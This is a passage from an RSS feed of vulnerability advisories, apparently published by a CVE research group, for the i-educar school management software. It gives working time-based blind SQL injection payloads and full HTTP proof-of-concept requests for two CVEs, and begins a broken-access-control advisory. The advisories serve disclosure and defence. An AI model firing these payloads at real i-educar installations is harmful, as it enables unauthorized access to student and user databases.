&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /module/TabelaArredondamento/edit?id=1&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 680
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: http://localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/TabelaArredondamento/edit?id=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10011/image.png&amp;#34;
	width=&amp;#34;1126&amp;#34;
	height=&amp;#34;1006&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10011/image_hu_6843a63da889ac32.png 480w, /p/cve-2025-10011/image_hu_2a61729ca2b8044e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;111&amp;#34;
		data-flex-basis=&amp;#34;268px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10011.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10011.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 05 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10012</title>
        <link>https://www.cvehunters.com/p/cve-2025-10012/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10012/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10012-sql-injection-blind-time-based-vulnerability-in-ref_cod_aluno-parameter-on-educar_historico_escolar_lstphp-endpoint&amp;#34;&amp;gt;CVE-2025-10012: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10012&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10012&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10012-sql-injection-blind-time-based-vulnerability-in-ref_cod_aluno-parameter-on-educar_historico_escolar_lstphp-endpoint&amp;#34;&amp;gt;CVE-2025-10012: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10012&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10012&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_historico_escolar_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;ref_cod_aluno&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;AND 6986=(SELECT 6986 FROM PG_SLEEP(5))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /intranet/educar_historico_escolar_lst.php?ref_cod_aluno=206&#43;AND&#43;6986=(SELECT&#43;6986&#43;FROM&#43;PG_SLEEP(5)) HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10012/image.png&amp;#34;
	width=&amp;#34;1572&amp;#34;
	height=&amp;#34;707&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10012/image_hu_988aafc9dd1fbe7.png 480w, /p/cve-2025-10012/image_hu_7d467cabf908a825.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;222&amp;#34;
		data-flex-basis=&amp;#34;533px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10012/image-1.png&amp;#34;
	width=&amp;#34;1566&amp;#34;
	height=&amp;#34;711&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10012/image-1_hu_a4b5d2b9604e251f.png 480w, /p/cve-2025-10012/image-1_hu_465e2cc1a3c3c305.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;220&amp;#34;
		data-flex-basis=&amp;#34;528px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10012.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10012.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 05 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10013</title>
        <link>https://www.cvehunters.com/p/cve-2025-10013/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10013/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10013-broken-access-control-in-exportacao-para-o-seb-endpoint&amp;#34;&amp;gt;CVE-2025-10013: Broken Access Control in &amp;lt;code&amp;gt;/exportacao-para-o-seb&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10013&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10013&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/exportacao-para-o-seb&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;POST /exportacao-para-o-seb&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10013-broken-access-control-in-exportacao-para-o-seb-endpoint&amp;#34;&amp;gt;CVE-2025-10013: Broken Access Control in &amp;lt;code&amp;gt;/exportacao-para-o-seb&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10013&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10013&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/exportacao-para-o-seb&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
